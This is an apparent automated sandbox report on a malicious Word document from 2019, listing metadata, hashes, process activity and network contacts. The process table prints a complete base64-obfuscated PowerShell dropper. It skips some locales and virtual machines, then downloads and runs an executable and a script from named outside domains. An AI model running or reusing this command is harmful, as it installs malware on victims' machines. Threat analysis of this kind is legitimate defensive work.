File name: | Avviso-79787.doc |
Full analysis: | https://app.any.run/tasks/9a5f8a0b-5310-4724-a0e9-0d8439c1bb02 |
Verdict: | Malicious activity |
Analysis date: | September 19, 2019, 11:36:05 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Administrator, Template: Normal.dotm, Last Saved By: Administrator, Revision Number: 8, Name of Creating Application: Microsoft Office Word, Total Editing Time: 21:00, Create Time/Date: Sun Sep 8 16:10:00 2019, Last Saved Time/Date: Sun Sep 8 19:15:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | EE365F72A002CDF2AF7712D6AF9C36FC |
SHA1: | 355D6182AD6EE982ED3AD5405F253B6548C444F4 |
SHA256: | ADD5960AE3618938A120940E54345C2F47524549EF819222E476E1781BD67535 |
SSDEEP: | 1536:DC3hskRSSuclIyTPHkDD+WZbS+a92FgkmEonXDt:DIRSSuclIyoDDjG3 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | Administrator |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | Administrator |
RevisionNumber: | 8 |
Software: | Microsoft Office Word |
TotalEditTime: | 21.0 minutes |
CreateDate: | 2019:09:08 15:10:00 |
ModifyDate: | 2019:09:08 18:15:00 |
Pages: | 1 |
Words: | - |
Characters: | 1 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 1 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2756 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Avviso-79787.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2360 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'O2lmKCgoR2V0LVVJQ3VsdHVyZSkuTmFtZSAtbWF0Y2ggIkNOfFJPfFJVfFVBfEJZIikgLW9yICgoR2V0LVdtaU9iamVjdCAtY2xhc3MgV2luMzJfQ29tcHV0ZXJTeXN0ZW0gLVByb3BlcnR5IE1vZGVsKS5Nb2RlbCAtbWF0Y2ggIlZpcnR1YWxCb3h8Vk13YXJlfEtWTXxIVk0iKSl7ZXhpdDt9OyRhPUpvaW4tUGF0aCAkZW52OlB1YmxpYyAiXExpYnJhcmllc1xXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlLmpzIjskYj1Kb2luLVBhdGggJGVudjp0ZW1wICJNZW1vcnlDb21wcmVzc2lvbjMyLmV4ZSI7dHJ5eyhOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgiaHR0cDovL3Nlci5qb25uYWxiYW5kaWFuLmNvbS9sYXN0dXBkYXRlLnppcD9idXp6YXgiLCRiKTsgU3RhcnQtUHJvY2VzcyAkYjt9Y2F0Y2h7fTs7dHJ5eyhOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwOi8vd3dzLmNocmlzdGluZWRhdmllcy5iaXovP3BhZ2U9cmluZyZ2aWQ9cGl0NyZjdXN0dGciKXxvdXQtZmlsZSAkYTtTdGFydC1Qcm9jZXNzICRhO31jYXRjaHt9Ow==' ) );iex $a; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2756 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR886E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2360 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\16HXLHAK4YDAX1MLTPEP.temp | — | |
MD5:— | SHA256:— | |||
2756 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:C993E49D9B49364D5ADB734FD4718A55 | SHA256:A01D42DC685455148264B77F42F11045A635119E035A22BCC46ACBDA96CB41F0 | |||
2360 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
2360 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF168f92.TMP | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
2756 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$viso-79787.doc | pgc | |
MD5:004FF14B7C12B66775876A8DC23CE9C3 | SHA256:DC570C1DF7F3A64AA5147774A373827221B8375E693E2BE6F816541FE228A48A |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2360 | powershell.exe | GET | — | 185.158.249.39:80 | http://ser.jonnalbandian.com/lastupdate.zip?buzzax | NL | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2360 | powershell.exe | 185.158.249.39:80 | ser.jonnalbandian.com | easystores GmbH | NL | unknown |
Domain | IP | Reputation |
---|---|---|
ser.jonnalbandian.com |
| unknown |